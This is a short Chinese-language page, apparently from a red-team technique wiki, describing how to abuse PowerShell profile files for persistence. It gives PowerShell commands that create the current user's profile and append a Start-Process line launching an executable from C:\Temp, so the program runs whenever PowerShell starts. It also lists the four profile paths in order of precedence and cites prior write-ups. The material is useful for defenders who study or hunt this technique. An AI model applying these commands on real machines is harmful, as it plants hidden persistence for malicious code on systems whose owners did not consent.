滥用POWERSHELL配置文件

PowerShell启动时会执行配置文件的内容。

Powershell：

echo $profile
Test-Path $profile
New-Item -Path $profile -Type File –Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append

注：Powershell默认配置文件有多个，按照从上到下的顺序优先级从高到低

Description

Path

All Users, All Hosts

$PSHOME\Profile.ps1

All Users, Current Host

$PSHOME\Microsoft.PowerShell_profile.ps1

Current User, All Hosts

$Home[My ]Documents\PowerShell\Profile.ps1

Current user, Current Host

$Home[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1

参考文章：

GitHub - enigma0x3/PowershellProfile: Abuses Powershell ProfilesGitHub

Abusing Powershell Profilesenigma0x3

about_Profiles - PowerShellMicrosoftLearn

上一页AddMonitor 下一页W32Time

最后更新于4年前